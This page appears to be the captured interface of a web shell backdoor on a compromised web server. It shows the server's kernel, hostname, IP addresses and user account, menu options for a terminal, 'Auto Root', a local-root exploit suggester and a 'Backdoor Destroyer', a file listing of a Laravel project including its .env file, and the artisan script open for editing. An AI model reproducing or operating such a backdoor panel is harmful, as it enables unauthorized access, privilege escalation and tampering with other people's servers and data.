Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.64
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
pilasa-core /
Delete
Unzip
Name
Size
Permission
Date
Action
PilasaWebsite
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
app
[ DIR ]
drwxr-xr-x
2026-07-12 20:33
bestpro
[ DIR ]
drwxr-xr-x
2026-07-12 20:33
bootstrap
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
config
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
database
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
db
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
resources
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
routes
[ DIR ]
drwxr-xr-x
2026-07-12 20:31
storage
[ DIR ]
drwxrwxr-x
2026-07-12 20:31
tests
[ DIR ]
drwxr-xr-x
2026-07-12 20:31
vendor
[ DIR ]
drwxr-xr-x
2026-07-12 20:31
.env
644
B
-rw-r--r--
2024-08-17 05:35
.env.example
521
B
-rw-r--r--
2017-09-10 09:14
.htaccess
197
B
-r--r--r--
2026-06-01 03:28
PilasaWebsite.zip
34.58
MB
-rw-r--r--
2024-07-25 10:23
artisan
1.61
KB
-rw-r--r--
2017-07-11 04:08
composer.json
1.84
KB
-rw-r--r--
2024-07-17 14:07
composer.lock
382.72
KB
-rw-r--r--
2024-07-17 14:07
package.json
1.04
KB
-rw-r--r--
2017-07-11 04:08
phpunit.xml
1.03
KB
-rw-r--r--
2017-07-11 04:08
readme.md
3.34
KB
-rw-r--r--
2017-07-11 04:08
server.php
652
B
-rw-r--r--
2024-08-17 05:20
storage.zip
852.57
KB
-rw-r--r--
2024-07-25 11:13
webpack.mix.js
555
B
-rw-r--r--
2017-07-11 04:08
Save
Rename
#!/usr/bin/env php <?php /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/bootstrap/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);